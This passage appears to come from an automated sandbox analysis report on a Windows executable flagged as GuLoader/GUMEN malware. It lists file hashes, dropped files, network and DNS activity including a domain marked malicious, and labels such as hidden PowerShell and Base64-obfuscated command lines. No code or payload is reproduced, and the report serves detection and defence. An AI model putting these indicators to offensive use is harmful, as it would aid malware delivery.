		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5772	b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2.exe	C:\Users\admin\AppData\Roaming\teltninger\traplike\Primatical\Stridulation\Telharmonium\haandteringen.wic		binary
		MD5:ED67889E23A0080959F356340FC3100F	SHA256:87936FD62C9D17B2A62720F6C2DF59A88255FB7E68626B48B9E700D7C00CE21F
5776	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_aquj0301.fnu.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
7296	SIHClient.exe	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
6544	svchost.exe	GET	200	2.23.77.188:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
—	—	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
—	—	GET	200	2.16.241.19:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
7296	SIHClient.exe	GET	200	2.23.246.101:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
7852	wab.exe	GET	200	65.9.66.2:80	http://r11.c.lencr.org/33.crl	unknown	—	—	whitelisted
7852	wab.exe	GET	200	23.209.209.135:80	http://x1.c.lencr.org/	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:137	—	—	—	whitelisted
—	—	51.104.136.2:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
7564	svchost.exe	51.104.136.2:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	2.16.241.19:80	crl.microsoft.com	Akamai International B.V.	DE	whitelisted
6544	svchost.exe	20.190.159.64:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	whitelisted
—	—	2.23.246.101:80	www.microsoft.com	Ooredoo Q.S.C.	QA	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
6544	svchost.exe	20.190.159.2:443	—	MICROSOFT-CORP-MSN-AS-BLOCK	IE	unknown
6544	svchost.exe	2.23.77.188:80	ocsp.digicert.com	AKAMAI-AS	DE	whitelisted
3216	svchost.exe	172.211.123.248:443	client.wns.windows.com	MICROSOFT-CORP-MSN-AS-BLOCK	FR	whitelisted

DNS requests

Domain	IP	Reputation
crl.microsoft.com	2.16.241.19 2.16.241.12	whitelisted
www.microsoft.com	2.23.246.101	whitelisted
google.com	142.250.186.174	whitelisted
ocsp.digicert.com	2.23.77.188	whitelisted
settings-win.data.microsoft.com	51.124.78.146	whitelisted
client.wns.windows.com	172.211.123.248	whitelisted
slscr.update.microsoft.com	4.245.163.56	whitelisted
fe3cr.delivery.mp.microsoft.com	40.69.42.241	whitelisted
inhanoi.net.vn	45.252.248.26	malicious
x1.c.lencr.org	23.209.209.135	whitelisted

Threats

No threats detected

Add for printing

No debug info

General Info

b3932a0a2ec299c8a287a7f5eccc2913c5be856c7fba20973333084f093e73e2

2C2F9D34317A7FC98E6E9678037FC8D8

30900CAE87E860D480ED98D9142A9B0E7CAFC888

B3932A0A2EC299C8A287A7F5ECCC2913C5BE856C7FBA20973333084F093E73E2

24576:zIBDNs3KOwagwkUUUUf9mrMFT6b/oOch1FseIAkH5nyvBCRNQfuv4Ug8A9EFU6Qr:EBDNs3KOwagwKFsc7FseIAkH5nyvBCRc

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Run PowerShell with an invisible window

GUMEN has been detected

Detected an obfuscated command line used with Guloader

SUSPICIOUS

Starts POWERSHELL.EXE for commands execution

Reads binary file using Get-Content

Application launched itself

Converts a specified value to a byte (POWERSHELL)

Reads security settings of Internet Explorer

Base64-obfuscated command line is found

INFO

Creates files or folders in the user directory

Checks supported languages

The sample compiled with english language support

Reads the computer name

Gets data length (POWERSHELL)

Creates or changes the value of an item property via Powershell

Uses string split method (POWERSHELL)

Converts byte array into ASCII string (POWERSHELL)

Checks proxy server information

Reads the software policy settings

Reads the machine GUID from the registry

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings